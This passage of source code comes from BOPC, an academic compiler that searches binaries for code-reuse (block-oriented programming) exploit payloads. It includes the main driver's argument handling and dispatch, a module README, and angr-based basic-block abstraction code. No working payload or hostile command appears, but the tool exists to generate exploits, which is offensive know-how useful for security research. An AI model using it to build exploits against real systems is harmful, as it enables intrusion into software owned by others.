        required = False,
    )

    group_s.add_argument(
        "--find-all",
        help     = "Find all the solutions",
        action   = 'store_const',
        default  = 'one',
        const    = 'all',
        dest     = 'findall',
        required = False
    )


    # -------------------------------------------------------------------------
    # Group for debugging arguments
    # -------------------------------------------------------------------------
    group_d.add_argument(
        "--mapping-id",
        help     = "Run the Trace Searching algorithm on a given mapping ID",
        metavar  = 'ID',
        action   = 'store',
        default  = -1,
        dest     = 'mapping_id',
        required = False
    )

    group_d.add_argument(
        "--mapping",
        help     = "Run the Trace Searching algorithm on a given register mapping",
        metavar  = 'MAP',
        nargs    = '+',
        action   = 'store',
        default  = [],
        dest     = 'mapping',
        required = False
    )

    group_d.add_argument(
        "--enum-mappings",
        help     = "Enumerate all possible mappings and exit",
        action   = 'store_const',
        default  = False,
        const    = True,
        dest     = 'enum_mappings',
        required = False
    )

    group_d.add_argument(
        "--abstract-blk",
        help     = "Abstract a specific basic block and exit",
        metavar  = 'BLKADDR',
        action   = 'store',
        dest     = 'absblk',
        required = False
    )


    # -------------------------------------------------------------------------
    # Group for application capabilities
    # -------------------------------------------------------------------------
    group_c.add_argument(
        '-c', "--capability",
        help     = textwrap.dedent('''\
                    Measure application's capability. Options (can be many)

                    all\tSearch for all Statements
                    regset\tSearch for Register Assignments
                    regmod\tSearch for Register Modifications
                    memrd\tSearch for Memory Reads
                    memwr\tSearch for Memory Writes
                    call\tSearch for Function/System Calls
                    cond\tSearch for Conditional Jumps
                    load\tLoad capabilities from file
                    save\tSave capabilities to file
                    noedge\tDump statements and exit (don't calculate edges)'''),
        choices  = ['all', 'regset', 'regmod', 'memrd', 'memwr', 'call', 'cond',
                    'save', 'load', 'noedge'],
        metavar  = 'OPTIONS',
        nargs    = '+',                             # consume >=1 arguments (multiple options)
        action   = 'store',
        dest     = 'capabilities',
        required = False
    )


    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    return parser.parse_args()                      # do the parsing (+ error handling)


# ---------------------------------------------------------------------------------------------
# load(): Load the target binary and generate its CFG.
#
# :Arg filename: Binary's file name
# :Ret: Function returns
#
def load( filename ):
    # load the binary (exception is thrown if name is invalid)
    project = angr.Project(filename, load_options={'auto_load_libs': False})


    # generate CFG
    dbg_prnt(DBG_LVL_0, "Generating CFG. It might take a while...")
    CFG = project.analyses.CFGFast()
    dbg_prnt(DBG_LVL_0, "CFG generated.")


    # normalize CFG (i.e. make sure that there are no overlapping basic blocks)
    dbg_prnt(DBG_LVL_0, "Normalizing CFG...")
    CFG.normalize()

    # normalize every function object as well
    for _, func in project.kb.functions.iteritems():
        if not func.normalized:
            dbg_prnt(DBG_LVL_4, "Normalizing function '%s' ..." % func.name)
            func.normalize()

    dbg_prnt(DBG_LVL_0, "Done.")


    emph("CFG has %s nodes and %s edges" %
                (bold(len(CFG.graph.nodes())), bold(len(CFG.graph.edges()))))


    # create a quick mapping between addresses and nodes (basic blocks)
    for node in CFG.graph.nodes():
        ADDR2NODE[ node.addr ] = node


    # create a quick mapping between basic block addresses and their corresponding functions
    for _, func in CFG.functions.iteritems():       # for each function
        for addr in func.block_addrs:               # for each basic block in that function
            ADDR2FUNC[ addr ] = func


    return project, CFG


# ---------------------------------------------------------------------------------------------
# abstract(): Abstract the CFG and apply any further abstraction-related operations.
#
# :Arg mark: A valid graph marking object.
# :Arg mode: Abstraction mode (load, save, saveonly, none)
# :Arg filename: Abstraction's file name (if applicable)
# :Ret: None.
#
def abstract( mark, mode, filename ):
    if mode == 'none':
        mark.abstract_cfg()                         # calculate the abstractions

    if mode == 'load':
        mark.load_abstractions(filename)            # simply load the abstractions

    elif mode == 'save':
        mark.abstract_cfg()                         # calculate the abstractions
        mark.save_abstractions(filename)            # and save them

    elif mode == 'saveonly':
        mark.abstract_cfg()
        mark.save_abstractions(filename)
        return -1

    return 0


# ---------------------------------------------------------------------------------------------
# capability_analyses(): Apply any (custom) analyses to the capabilities.
#
# :Arg cap: The capability object
# :Ret: None.
#
def capability_analyses( cap ):
    dbg_prnt(DBG_LVL_0, 'Applying additional Capability analyses...')
    return

    '''
    # analyze all islands
    # cap.analyze(P.CAP_LOOPS, P.CAP_STMT_MIN_DIST)

    # analyze a specific island
    # cap.analyze_island(0x400885, P.CAP_STMT_COMB_CTR)

    i = 0
    def foo( graph ):
        global i
        print 'Visualing island %d' % i
        cap.visualize(graph, 'island_%d' % i, show_labels=True)

        i += 1

        for _, d in graph.nodes_iter(data=True):
            print d['type'] # check capability.__add() for all keys


    # apply the callback to every island
    cap.callback( foo )
    '''


# -------------------------------------------------------------------------------------------------
# main(): This is the main function of BOPC.
#
# Ret: None.
#
if __name__ == '__main__':
    args = parse_args()                         # process arguments
    set_dbg_lvl( args.dbg_lvl )                 # set debug level in coreutils

    now  = datetime.datetime.now()              # get current time


    # -------------------------------------------------------------------------
    # Display banner
    # -------------------------------------------------------------------------
    print rainbow(textwrap.dedent('''
        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
        %                                                                    %
        %                :::::::::   ::::::::  :::::::::   ::::::::          %
        %               :+:    :+: :+:    :+: :+:    :+: :+:    :+:          %
        %              +:+    +:+ +:+    +:+ +:+    +:+ +:+                  %
        %             +#++:++#+  +#+    +:+ +#++:++#+  +#+                   %
        %            +#+    +#+ +#+    +#+ +#+        +#+                    %
        %           #+#    #+# #+#    #+# #+#        #+#    #+#              %
        %          #########   ########  ###         ########                %
        %                                                                    %
        %                Block Oriented Programming Compiler                 %
        %                                                                    %
        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
        '''))

    print comments
    print "[*] Starting BOPC %s at %s" % (VERSION, bolds(now.strftime("%d/%m/%Y %H:%M")))


    # -------------------------------------------------------------------------
    # BOPC operation: Emit SPL IR
    # -------------------------------------------------------------------------
    if args.emit_IR and args.source:
        IR = C.compile(args.source)
        IR.compile()                                # compile the SPL payload

        IR = O.optimize(IR.get_ir())
        IR.optimize(mode=args.optimizer)           # optimize IR (if needed)

        IR.emit(args.source)


    # -------------------------------------------------------------------------
    # BOPC operation: Trace Search
    # -------------------------------------------------------------------------
    elif args.source and args.entry:
        IR = C.compile(args.source)
        IR.compile()                                # compile the SPL payload

        IR = O.optimize(IR.get_ir())
        IR.optimize(mode=args.optimizer)            # optimize IR (if needed)


        project, CFG = load(args.binary)
        mark         = M.mark(project, CFG, IR, 'puts')

        if abstract(mark, args.abstractions, args.binary) > -1:
            entry = int(args.entry, 0)              # get entry point

            X = mark.mark_candidate(sorted(map(lambda s : tuple(s.split('=')), args.mapping)))

            if not X:
                print 'abort';
                exit()


        #   visualize('cfg_cand', entry=entry, options=VO_DRAW_CFG|VO_DRAW_CANDIDATE)

            # extract payload name (without the extenstion)
            payload_name = ntpath.basename(args.source)
            payload_name = os.path.splitext(payload_name)[0]


            try:
                options = {
                    'format'     : args.format,
                    'solutions'  : args.findall,
                    'mapping-id' : int(args.mapping_id),
                    'mapping'    : sorted(map(lambda s : tuple(s.split('=')), args.mapping)),
                    'filename'   : '%s-%s' % (args.binary, payload_name),
                    'enum'       : args.enum_mappings,

                    'simulate'   : False,
                    '#mappings'  : 0,
                    '#solutions' : 0
                }

            except ValueError:
                fatal("'mapping' argument must be an integer")


            tsearch = S.search(project, CFG, IR, entry, options)
            tsearch.trace_searching(mark)

            # -----------------------------------------------------------------
            # Show some statistics
            # -----------------------------------------------------------------
            emph("Trace Searching Statistics:" )
            emph("\tUsed Simulation? %s"  % bolds(options['simulate']))
            emph("\t%s Mapping(s) tried"  % bold(options['#mappings']))
            emph("\t%s Solution(s) found" % bold(options['#solutions']))


    # -------------------------------------------------------------------------
    # BOPC operation: Dump abstractions
    # -------------------------------------------------------------------------
    elif args.abstractions == 'saveonly':
        # IR is useless; we're only dumping abstractions
        project, CFG = load(args.binary)
        mark         = M.mark(project, CFG, None, 'puts')

        abstract(mark, args.abstractions, args.binary)


    # -------------------------------------------------------------------------
    # BOPC operation: Application Capability
    # -------------------------------------------------------------------------
    elif args.capabilities:
         # IR is useless; we're measuring capability
        project, CFG = load(args.binary)
        mark         = M.mark(project, CFG, None, 'puts')

        abstract(mark, args.abstractions, args.binary)

        # cfg is loaded with abstractions
        cap = P.capability(CFG, args.binary)

        options = 0

        for stmt in args.capabilities:
            options = options | {
                'all'    : P.CAP_ALL,
                'regset' : P.CAP_REGSET,
                'regmod' : P.CAP_REGMOD,
                'memrd'  : P.CAP_MEMRD,
                'memwr'  : P.CAP_MEMWR,
                'call'   : P.CAP_CALL,
                'cond'   : P.CAP_COND,
                'load'   : P.CAP_LOAD,
                'save'   : P.CAP_SAVE,
                'noedge' : P.CAP_NO_EDGE
            }[stmt]     # argparse ensures no KeyError

        cap.build(options=options)                  # build the Capability Graph
        cap.save()                                  # save nodes to a file
        cap.explore()                               # explore Islands

        capability_analyses( cap )


    # -------------------------------------------------------------------------
    # BOPC operation: Single block abstraction
    # -------------------------------------------------------------------------
    elif args.binary and args.absblk:
        project = angr.Project(args.binary, load_options={'auto_load_libs': False})

        load(args.binary)

        abstr   = A.abstract_ng(project, int(args.absblk, 0))

        dbg_prnt(DBG_LVL_0, 'Abstractions for basic block 0x%x:' % int(args.absblk, 0))
        for a, b in abstr:
            if a == 'regwr':
                dbg_prnt(DBG_LVL_0, '%14s :' % a)
                for c, d in b.iteritems():
                    dbg_prnt(DBG_LVL_0, '\t\t%s = %s' % (c, str(d)))

            else:
                dbg_prnt(DBG_LVL_0, '%14s : %s' % (a, str(b)))


    # -------------------------------------------------------------------------
    # invalid BOPC operation
    # -------------------------------------------------------------------------
    else:
        fatal('Invalid configuration argument')


    emph('')
    emph('BOPC has finished.', DBG_LVL_0)
    emph('Have a nice day!',        DBG_LVL_0)
    emph('Bye bye :)',              DBG_LVL_0)

    warn('A segmentation fault may occur now, due to an internal angr issue')


# ---------------------------------------------------------------------------------------


================================================
FILE: source/README.md
================================================


# Block Oriented Programming Compiler (BOPC)


___

### BOPC Implementation Overview

![alt text](./images/BOPC_overview.png)


### Source Code Overview


| File                             | Description                                 |
| ---------------------------------|---------------------------------------------|
| [BOPC.py](./BOPC.py)             | Main file |
| [absblk.py](./absblk.py)         | Basic block abstraction |
| [calls.py](./calls.py)           | Supported library and system calls |
| [capability.py](./capability.py) | Application Capability |
| [compile.py](./compile.py)       | SPL compiler |
| [config.py](./config.py)         | Configuration file |
| [coreutils.py](./coreutils.py)   | Shared utils across modules |
| [delta.py](./delta.py)           | Delta graph |
| [map.py](./map.py)               | Mapping across registers and variables |
| [mark.py](./mark.py)             | Marking and re-Marking CFG |
| [optimize.py](./optimize.py)     | SPL optimizer |
| [output.py](./output.py)         | Write solutions to a file |
| [path.py](./path.py)             | CFG shortest paths |
| [search.py](./search.py)         | Trace Searching algorithm |
| [simulate.py](./simulate.py)     | Concolic execution |


___

================================================
FILE: source/absblk.py
================================================
#!/#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# absblk.py:
#
# This module implements the basic block "abstractions". Abstraction is a process that summarizes
# a basic block into the "impact" on program's state.
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
import signal
import simuvex
import claripy
import archinfo
import angr


# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------
_STACK_SZ = 0x1000                                  # size of symbolic stack


# -------------------------------------------------------------------------------------------------
# abstract_ng: This class implements the next generation of the basic block "abstraction". So
#   far, the following abstractions are supported:
#  
#   * * Register Writes * *
#   A dictionary that contains all registers that are being written. The "write" information is
#   another dictionary with the following fields:
#
#       * type     : Can be 'concrete', 'deref', 'mod' or 'clob'. A register is of type 'clob'
#                    when, it does not fall to any of the other types
#       * const    : ('concrete' and 'mod' types). The constant value that is written to the
#                    register
#       * writable : ('concrete' types). If the constant value is a valid and writable memory
#                    address, then this field is set to True
#       * op       : ('mod' types). The modification operator
#       * addr     : ('deref' types). The address that register value is loaded from
#       * deps     : ('deref' types). Any registers that participate in addr field
#       * sym      : ('deref' types). A mapping between registers and their symbolic variables
#       * memrd    : ('deref' types). When the register write can be used as a memory read, this
#                    field contains the size of the memory read in bytes (1,2,4,8). Otherwise it
#                    is set to None
#
#   Example:
#       regwr = {
#           rsp : {'type': 'concrete', 'const': 576460752303357888L, 'writable': True },
#           rcx : {'type': 'deref', 'addr': <BV64 rsi_43_64 + 0x10>, 'deps': ['rsi']},
#           r9  : {'type': 'mod', 'op': '+', 'const': 1337L}
#       }
#
#
#   * * Memory Reads * *
#   A list of tuples (address, size) for every memory read.
#
#   Example:
#       memrd = set([(<SAO <BV64 0x7ffffffffff0810>>, 64), (<SAO <BV64 0x7ffffffffff0818>>, 64)])
#
#
#   * * Memory Writes * *
#   A list of tuples (address, data) for every memory write (len(data) indicates the size)
#
#   Example:
#       memwr = set([(<SAO <BV64 0x7ffffffffff07f8>>, <SAO <BV64 rbx_1_64>>), 
#                    (<SAO <BV64 0x7ffffffffff07e0>>, <SAO <BV64 0x416631>>)])
#
#
#   * * Concrete Writes * *
#   A list of tuples (address, size) for every concrete memory write.
#
#   Example:
#       conwr = set([(576460752303359992L, 64), (576460752303359968L, 64)])
#
#
#   * * SPL Memory Writes * *
#   A list of dictionaries for every SPL memory write (memory writes that are in the form:
#   "mov [rax], rbx"). Each dictionary contains the following fields:
#
#       * mem  : The register that holds the address to write (string)
#       * val  : The register that holds the value to be written (string)
#       * size : The number of bytes to write (e.g., mov [rax], cl, mov [rbx], dx)
#       * sym  : A mapping between registers and their symbolic variables
#
#   Example:
#       splmemwr = [{
#            'mem'  : 'rbx', 
#            'val'  : 'rax', 
#            'size' : 4,
#            'sym'  : {'rax': <BV64 rax_0_64>, 'rbx': <BV64 rbx_1_64>}
#       }]
#
#
#   * * Calls * *
#   A dictionary with the following fields:
#
#       * type : Can be 'syscall', or 'libcall'
#       * name : The name of the call
#
#   Example:
#       call = {'type': 'libcall', 'name': u'puts'}
#
#
#   * * Conditional Jumps * *
#   A dictionary with the following fields:
#
#       * form      : The form of the conditional jump ('simple' / 'extended')
#       * reg       : The register that participates in the conditional jump
#       * const     : The constant value that register is compared against
#       * op        : The comparison operator
#       * mod_op    : ('extended' types). The operator of the register modification
#       * mod_const : ('extended' types). The constant of the register modification
#
#   Example:
#       cond = {'reg': 'r11', 'op': '==', 'const': 11L}
#       cond = {'mod_op': '^', 'const': 0L, 'form': 'extended', 'op': '=='}
#
#
#   * * Symbolic Variables * *
#   A dictionary that maps the symbolic variables to their actual addresses that they correspond
#
#   Example:
#       symvar = {<BV64 mem_7fffffffffef1e8_82_64>' : 0x7fffffffffef1e8}
#
#
# * * * ---===== TODO list =====--- *
#
#   [1]. Make absblk more precise i.e., check the order of memory writes
#   [2]. Move this list at the beginning of the file.
#
class abstract_ng( object ):
    ''' ======================================================================================= '''
    '''                                   AUXILIARY FUNCTIONS                                   '''
    ''' ======================================================================================= '''
 
    # ---------------------------------------------------------------------------------------------
    # __reg_w(): Analyze the register writes of the symbolic execution.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __reg_w( self, state ): 
        visited = set()                             # visited registers

        for action in reversed(state.actions):      # for every action (start backwards)    
            if not (action.type == 'reg' and action.action == 'write'):
                continue                            # we care about register writes only                        

            try:
                # we only care about the most recent register write only            
                reg = self.__proj.arch.register_names[action.offset]
            except KeyError:
                continue

            # get the last write only
            if reg not in HARDWARE_REGISTERS or reg in visited:
                continue

            data = { }                              # various data related to the write
            visited.add(reg)                        # make sure that you won't visit this again


            # ---------------------------------------------------------------------------
            # If some address (initialized or not) is used as a dereference, the regwr
            # entry for that register must be preserved (we should not overwrite register
            # with the actual value in that address)
            # ---------------------------------------------------------------------------
            if reg in self.regwr and self.regwr[ reg ]['type'] == 'deref':
                continue

            # The register is being modified, so we start by marking it as clobbering
            if reg not in self.regwr:
                self.regwr[ reg ] = {'type' : 'clob'}

            
            # -----------------------------------------------------------------
            if action.data.concrete:                # if register gets a concrete value,
                value = state.se.eval(action.data)  # concretize it

                data['type']     = 'concrete'       # set data
                data['const']    = value
                data['writable'] = True             # initialize this first
                in_section = False

                # now, check whether this value is a writable address                
                try:                    
                    # The problem: There are some weird sections (.e.g., ".comment") whose VA
                    # starts from 0. Therefore, we may have register writes with constants like
                    # 1, 2 and so on, which are marked as +W. This means that at the end we can 
                    # have memory reservations (writes) at those addresses. Our old approach with 
                    # "state.memory.permissions(value)" doesn't work here.
                    #
                    # So iterate over ELF sections looking for it
                    for _, sec in  self.__proj.loader.main_object.sections_map.iteritems():                        
                        # it's possible for the value to be part of >1 sections (usually when
                        # section's VA is 0; sec.vaddr != 0). We mark value as +W only when *all*
                        # sections are writable
                        if sec.contains_addr(value):
                            data['writable'] &= sec.is_writable
                            in_section = True


                    # if can't find section (b/c it's generated at runtime, like .stack)
                    if not in_section:
                        # TODO: check if value+1, value+2, etc. are writable as well
                        rwx = state.memory.permissions(value)

                        if state.se.eval(rwx) & 2 == 2: # is +W (2nd bit) set?
                            data['writable'] = True
                        else:
                            data['writable'] = False
                        
                except Exception, e:                # page does not exist at given address
                    data['writable'] = False        # not writable at all

                    try:
                        # special case when a stack address is in the next page (-W)
                        if value & 0x07ffffffffff0000 == 0x07ffffffffff0000:
                            rwx = state.memory.permissions(value-0x4000)

                            # give it a second change
                            if state.se.eval(rwx) & 2 == 2:
                                data['writable'] = True

                    except Exception, e:            # or angr.errors.SimMemoryError
                        pass

            # -----------------------------------------------------------------
            else:                                   # register doesn't get a concrete value

                # register gets an expression. Check for simple register modifications: 
                # "<reg> <op>= <const>" (we can easily scale this to <reg> <op>= <reg>)
                # Note that modified register should be the same with action.offset
                node = [leaf for leaf in action.data.recursive_leaf_asts]
                    
                # we need an AST with depth 2, 2 leaves and 1 variable (i.e., register)
                if action.data.depth == 2 and len(action.data.variables) == 1 and len(node) == 2:
                    try:
                        data['op'] = {              # cast operator
                            '__add__'    : '+',
                            '__sub__'    : '-',
                            '__mul__'    : '*',
                            '__div__'    : '/',
                            '__and__'    : '&',
                            '__or__'     : '|',
                            '__xor__'    : '^',
                            '__invert__' : '~',
                            '__lshift__' : '<<',
                            '__rshift__' : '>>'
                        }[ action.data.op ]
                    
                        # if constant is on the left, swap sides
                        if node[0].op == 'BVV' and node[0].concrete:
                            node[0], node[1] = node[1], node[0]


                        # check if we're in the form: <reg> <op> <const> 
                        if node[0].op == 'BVS' and self.__symreg[node[0]] == reg and \
                           node[1].op == 'BVV' and node[1].concrete:
                                data['type']  = 'mod'
                                data['const'] = state.se.eval(node[1])
                        else:                       # not in the right form
                                continue

                    except KeyError:                # __symreg() threw an exception
                        continue

        
                # -----------------------------------------------------------------------
                # Consider the following case:
                #       .text:000000000040BA49         mov     eax, [rbp+tfd]
                #       .text:000000000040BA52         mov     edi, eax         ; fd
                #
                # Here, edi gets exactly the same value with eax, but edi is marked as
                # 'clob', while eax as 'deref'. The root cause is that edi does not
                # participate in any memory reads and the assigned value is not constant
                # (i.e., it doesn't come directly from a register).
                #
                # To fix that we check whether a 'clob' register has *exactly* the same 
                # symbolic value with another one (eax in our example), and if so we 
                # assign the same regwr entry to it.
                # -----------------------------------------------------------------------
                else:
                    # iterate over previous writes
                    for reg2, val in self.__reg_rawval.iteritems():
                        try:

                            # check if raw values match
                            if reg != reg2 and val.shallow_repr() == action.data.shallow_repr():

                                self.regwr[ reg ] = self.regwr[ reg2 ]
                                pass

                        except KeyError:
                            pass


            # -----------------------------------------------------------------
            if data:
                self.regwr[ reg ] = data            # set data to this register
        

    # ---------------------------------------------------------------------------------------------
    # __mem_r(): Analyze the memory reads of the symbolic execution.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __mem_r( self, state ):
        for action in state.actions:                # for every action        
            if not (action.type == 'mem' and action.action == 'read'):
                continue                            # we care about memory reads only

            # simply add address (can be an expression) and size to the list
            self.memrd.add( (action.addr, len(action.data)) )


    # ---------------------------------------------------------------------------------------------
    # __mem_w(): Analyze the memory writes of the symbolic execution.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __mem_w( self, state ):
        for action in state.actions:                # for every action        
            if not (action.type == 'mem' and action.action == 'write'):
                continue                            # we care about memory writes only

            # simply add address (can be an expression) and data to the list
            self.memwr.add( (action.addr, action.data) ) 
            
            if action.addr.concrete:                # if address is concrete
                # concretize it as well
                self.conwr.add( (state.se.eval(action.addr), len(action.data)) )


            deps   = [ ]
            symtab = { }

            # -----------------------------------------------------------------
            # Check for memory register writes (mov [rax], rbx)
            #
            # In this case, both action.addr and action.data will consist of a
            # single leaf in their ast which is a register
            # -----------------------------------------------------------------
            mem_reg = [leaf for leaf in action.addr.recursive_leaf_asts]
            val_reg = [leaf for leaf in action.data.recursive_leaf_asts]


            # print 'ADDR', mem_reg, action.addr
            # print 'ADDR', val_reg, action.addr
                 
            # check AST have a single leaf
            if len(mem_reg) == 1 and len(val_reg) == 1:
                mem, val = None, None

                # check whether the leaf is a register
                for sym, nam in self.__symreg.iteritems():
                    # skip registers that are not symbolic (e.g., rbp)
                    if isinstance(sym.args[0], str) and sym.args[0] in mem_reg[0].shallow_repr():                        
                        symtab[nam] = sym
                        mem         = nam

                    elif isinstance(sym.args[0], str) and sym.args[0] in val_reg[0].shallow_repr():                        
                        symtab[nam] = sym
                        val         = nam

                # if both leaves are registers we have a memory register write!
                if mem and val:                
                    self.splmemwr.append({
                        'mem'  : mem,
                        'val'  : val,
                        'size' : int(action.size) >> 3,
                        'sym'  : symtab,                      
                    })


    # ---------------------------------------------------------------------------------------------
    # __call(): Analyze the (sys|lib)calls of the symbolic execution. Because we're analyzing a
    #       single basic block, we can have up to one such (sys|lib)call (the last instruction).
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __call( self, state ):
        blk = self.__proj.factory.block(self.__entry)

        # check if symbolic execution stopped on a syscall
        # (don't use "if self.__proj._simos.is_syscall_addr(state.addr)"; it throws exceptions)
        if blk.vex.jumpkind == "Ijk_Sys_syscall":
            # a system call was invoked
            # we assume that simproc.cc == SimCCAMD64LinuxSyscall                
            simproc = self.__proj._simos.syscall(state)

            self.call['type'] = 'syscall'
            self.call['name'] = simproc.display_name
            # self.call['nargs'] = simproc.num_args

        else:  
            if blk.vex.jumpkind != "Ijk_Call":      # skip block when it doesn't end with a call
                return


            # check if symbolic execution stopped on a library call
            for action in reversed(state.actions):  # for every action        
                if action.type != 'exit':
                    continue                        # we care about branches only


                # concretize function's entry point
                target = state.se.eval(action.target)

                # Note: Before you use kb.functions, calculate CFG (e.g., analyses.CFGFast())
                try:
                    self.call['type'] = 'libcall'
                    self.call['name'] = self.__proj.kb.functions[target].name
                except Exception:                   # no function name at that address
                    self.call = { }


    # ---------------------------------------------------------------------------------------------
    # __cond(): Analyze the conditional jump of the symbolic execution. Because we're analyzing a
    #       single basic block, we can have up to one conditional jump.
    #
    # :Arg state: Program's state after symbolic execution
    # :Ret: None.
    #
    def __cond( self, state ):        
        for action in reversed(state.actions):      # for every action        
            if not (action.type == 'exit' and action.exit_type == 'conditional'):
                continue                            # we care about conditional jumps only
          

            # as in __reg_w(), we only care about simple conditional jumps: "<reg> <op> <const>"
            if len(action.condition.variables) == 1:  
                try:
                    self.cond['op'] = {             # cast operator
                        '__eq__' : '==',
                        '__ne__' : '!=',
                        '__le__' : '<=',
                        '__lt__' : '<',
                        '__ge__' : '>=',
                        '__gt__' : '>',

                        'SGT'    : '>',                        
                        'SGE'    : '>=',
                        'SLT'    : '<',
                        'SLE'    : '<=',                        
                        'UGT'    : '>',             # do not distinguish signed/unsigned operators
                        'UGE'    : '>=',
                        'ULT'    : '<',
                        'ULE'    : '<=',
                    }[ action.condition.op ]
                except KeyError: 
                    warn('Unknown conditional jump operator "%s"' % action.condition.op)
                    self.cond = { }
                    return

                
                node = [leaf for leaf in action.condition.recursive_leaf_asts]


                # -----------------------------------------------------------------------
                # Check if we're in the simple form: <reg> <op> <const>
                # -----------------------------------------------------------------------
                if len(node) == 2:                  # we need 2 leaves + 1 operator
                    self.cond['form'] = 'simple'    # we're in the simple form

                    try:
                        # swap register and constant if needed
                        if node[1].op == 'BVS' and node[0].op == 'BVV' and node[0].concrete:
                            node[0], node[1] = node[1], node[0]


                        # if we're in the right form (reg and const), we have our condition
                        if node[0].op == 'BVS' and node[1].op == 'BVV' and node[1].concrete:
                            self.cond['reg']   = self.__symreg[node[0]]
                            self.cond['const'] = state.se.eval(node[1])
                        else:
                            self.cond = { }         # not in the right form
                            return

                    except KeyError:                    
                        # if not in the right form, __symreg() will throw a KeyError exception
                        self.cond = { }
                        return


                # -----------------------------------------------------------------------
                # Check if we're in the extended form: (<reg> <op> <const>) <op> <const>
                # (example: "<SAO <Bool (rbx_1_64 + 0x1) == 0x8>>")
                # 
                # This is when the iterator (register) gets modified and compared at the
                # same basic block.
                # -----------------------------------------------------------------------
                elif len(node) == 3:                # we need 3 leaves and 2 operators
                    self.cond['form'] = 'extended'  # we're in the extended form

                    try:
                        # get left and right side of the comparison
                        left, right = action.condition.split( action.condition.op )

                        # if the constant is on the left side, swap sides
                        if left.op == 'BVV' and left.concrete:
                            left, right = right, left


                        mod_ops = {                 # register modification operations
                            '__add__'    : '+',
                            '__sub__'    : '-',
                            '__mul__'    : '*',
                            '__div__'    : '/',
                            '__and__'    : '&',
                            '__or__'     : '|',
                            '__xor__'    : '^',
                            '__invert__' : '~',
                            '__lshift__' : '<<',
                            '__rshift__' : '>>'
                        }

                        
                        # if the left side is a modification and the right side a constant
                        if left.op in mod_ops and right.op == 'BVV' and right.concrete:
                            self.cond['const']  = state.se.eval(right)
                            self.cond['mod_op'] = mod_ops[ left.op ]

                            reg, const = left.split( left.op )

                            # if the constant is on the left side, swap sides
                            if reg.op == 'BVV' and reg.concrete:
                                reg, const = const, reg

                            # if the modification uses a constant and a register
                            if reg.op   == 'BVS' and reg in self.__symreg and \
                               const.op == 'BVV' and const.concrete:
                                    self.cond['reg']       = self.__symreg[reg]
                                    self.cond['mod_const'] = state.se.eval(const)
                            else:
                                self.cond = { }     # something is not in the right form
                                return    
                        else:
                            self.cond = { }
                            return    
                                    
                    except ValueError:              # != 2 values to split()
                        self.cond = { }
                        return


                # -----------------------------------------------------------------------
                # Otherwise we're not in the right form
                # -----------------------------------------------------------------------
                else:
                    self.cond = { }
                    continue


                # The problem here, is that simgr sometimes "inverts" the condition, so the 
                # "target" basic block is the block immediately after the current block. To 
                # be consistent, we have to "invert" the operator, so the target basic block
                # is executed when the jump is taken.
                blk = self.__proj.factory.block(self.__entry) 

                # check if the target is the next block (assume action.target is concrete)
                if state.se.eval(action.target) == blk.addr + blk.size:
                    self.cond['op'] = {                 # invert the condition
                        '==' : '!=',
                        '!=' : '==',
                        '>'  : '<=',
                        '>=' : '<',
                        '<'  : '>=',
                        '<=' : '>'
                    }[ self.cond['op'] ]  

            break                                   # there's up to 1 conditional jump


    # ---------------------------------------------------------------------------------------------
    # __add_sym_vars(): This function extracts all (memory) symbolic variables from an expression.
    #       For instance, given the expression: <BV64 mem_7fffffffffef1e8_82_64 + 0x68>, we want to
    #       map the variable 'mem_7fffffffffef1e8_82_64' to its actual address: 0x7fffffffffef1e8.
    #
    # :Arg addr_expr: The address expression to get variables from
    # :Ret: None.
    #
    def __add_sym_vars( self, addr_expr ):
        # A memory symbolic variable is in the form: mem_ADDRESS_RANDOM_SIZE. The AST leaf
        # will be like this: "<BV64 mem_7ffffffffff13e8_4928_64{UNINITIALIZED}>"
        #
        # We want to extract the ADDRESS and SIZE fields
        for leaf in addr_expr.recursive_leaf_asts:  # for each leaf in the AST
            leafstr = leaf.shallow_repr()           # cast it to sting

            # if leaf is a memory variable, extract its address and its size
            if re.search(r'mem_[0-9a-f]+_[0-9]+_[0-9]+', leafstr):
                _, addr, rand, size = leafstr.split('_')

                # size might be followed by the "{UNINITIALIZED}" keyword, so it must be dropped
                # if not the ">" must also be dropped
                size = size.replace("{UNINITIALIZED}>", "").replace(">", "")

                # add the symbolic variable to the map
                self.symvars[ leaf ] = (int(addr, 16), int(size, 10) >> 3)


    # ---------------------------------------------------------------------------------------------
    # __memread_callback(): This function is invoked every time that a memory read operation is 
    #       performed.
    #
    # :Arg state: Current state to read memory from
    # :Ret: None.
    #
    def __memread_callback( self, state ):
        if self.__callback_mutex == 1:              # if mutex is taken, return
            return
        
        self.__callback_mutex = 1                   # get lock

        # ---------------------------------------------------------------------
        # If address is part of the .bss/.data, it will be initialized with a
        # default value of 0. However, it can get any value (due to AWP) so it
        # should get a symbolic value.
        # ---------------------------------------------------------------------
        # get ELF sections that give default values to their uninitialized variables
        bss  = self.__proj.loader.main_object.sections_map[".bss"]
        data = self.__proj.loader.main_object.sections_map[".data"]

